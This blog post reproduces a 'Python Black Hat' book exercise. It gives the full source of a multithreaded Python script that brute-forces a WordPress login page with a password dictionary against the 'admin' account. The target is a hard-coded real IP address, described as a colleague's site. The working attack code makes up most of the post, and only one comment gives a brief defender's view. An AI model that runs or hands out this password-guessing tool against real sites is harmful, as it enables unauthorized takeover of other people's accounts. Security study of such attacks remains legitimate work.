Recently I received the network-security book "Python Black Hat" from the Electronic Industry Press. The book contains 24 experiments in total, and today I reproduce the 14th one (password guessing). My test environment is an MBP, a colleague's WordPress site, and a Conda development environment. One thing to say: weak passwords are fragile, but complex passwords cannot be guessed at all. It is worth affirming that you need to analyze the site's POST requests and responses, but simply burning CPU and network time on waiting is not advisable.
AILX10
1. Check the source code of the login page of the WordPress site
- First send a GET request and accept all the cookies it returns
- Parse the form element in the returned page (look at the input tags: log is the username, pwd is the password, wp-submit is the submit button, testcookie is the hidden cookie field)
- Modify the form elements from the returned page (set the username to "admin" and the password to each entry in the dictionary; everything else stays the same)
- Submit a POST request
2. Download the dictionary file
3. Run the script on the MBP
Reference Code:
# -*- coding: utf-8 -*-
# @Time : 2022/6/13 9:47 PM
# @Author : ailx10
# @File : wordpress_killer.py
from io import BytesIO
from lxml import etree
from queue import Queue
import requests
import sys
import threading
import time
# SUCCESS = "Welcome to WordPress!"
# Substring searched for in the POST response body to decide that a login
# succeeded; "欢迎" is the Chinese "Welcome" (the English variant is kept above).
SUCCESS = "欢迎"
# URL of the login form that the requests are sent to.
TARGET = "http://124.223.4.212/wp-login.php"
# Local path of the wordlist; get_words() splits it on whitespace, one
# candidate password per token.
WORDLIST = "/Users/ailx10/py3hack/chapter5/cain.txt"
def get_words():
    """Load the wordlist at WORDLIST into a Queue.

    The file is split on whitespace, so every token becomes one queue entry,
    in file order.

    Returns:
        queue.Queue of str candidates.
    """
    wordlist = Queue()
    with open(WORDLIST) as handle:
        tokens = handle.read().split()
    for token in tokens:
        wordlist.put(token)
    return wordlist
def get_params(content):
    """Collect every named <input> of an HTML page into a name -> value dict.

    Args:
        content: raw HTML bytes (e.g. ``Response.content``).

    Returns:
        dict mapping each input's ``name`` attribute to its ``value`` attribute
        (None when the input carries no ``value``). Inputs without a ``name``
        are skipped; a repeated name keeps the last occurrence.
    """
    html_parser = etree.HTMLParser()
    document = etree.parse(BytesIO(content), parser=html_parser)
    inputs = document.findall("//input")
    return {
        field.get("name"): field.get("value")
        for field in inputs
        if field.get("name") is not None
    }
class Bruter:
    """Dictionary-based login attempts against a WordPress wp-login.php form.

    Attributes:
        username: account name sent in the form's ``log`` field.
        url: login form URL.
        found: set to True by the first worker whose POST response contains
            SUCCESS; the other workers stop at their next loop check.

    From the defender's side, the traffic this produces is easy to spot:
    ten concurrent sessions from one source, each POSTing to the login URL
    about once per second with the same username, which is exactly the
    pattern login rate limiting and failed-login alerting are built for.
    """

    def __init__(self, username, url):
        self.username = username
        self.url = url
        self.found = False
        print(f"\nBrute Force Attack beginning on {url}.\n")
        print("Finished the setup where username = %s\n" % username)

    def run_bruteforce(self, passwords):
        """Start ten worker threads that all drain the shared ``passwords`` Queue."""
        workers = [
            threading.Thread(target=self.web_bruter, args=(passwords,))
            for _ in range(10)
        ]
        for worker in workers:
            worker.start()

    def web_bruter(self, passwords):
        """Worker body: fetch the form once, then submit one candidate per second.

        Runs until the queue is empty or another worker has set ``found``.
        NOTE: ``empty()`` and ``get()`` are not atomic across workers, so a
        worker that saw a non-empty queue can still block in ``get()`` if a
        sibling took the last entry in between.
        """
        session = requests.Session()
        landing = session.get(self.url)
        form = get_params(landing.content)
        form["log"] = self.username
        while not (passwords.empty() or self.found):
            time.sleep(1)
            candidate = passwords.get()
            print(f"Trying username/password {self.username}/{candidate:<10}")
            form["pwd"] = candidate
            reply = session.post(self.url, data=form)
            if SUCCESS not in reply.content.decode():
                continue
            self.found = True
            print(f"\nBruteforcing successful.")
            print("Username is %s" % self.username)
            print("Password is %s\n" % candidate)
            print("done.")
if __name__ == "__main__":
    # Load the candidates first so a missing wordlist fails before any
    # output is printed or any thread is started.
    candidates = get_words()
    bruter = Bruter("admin", TARGET)
    bruter.run_bruteforce(candidates)
Posted on 2022-06-13 22:23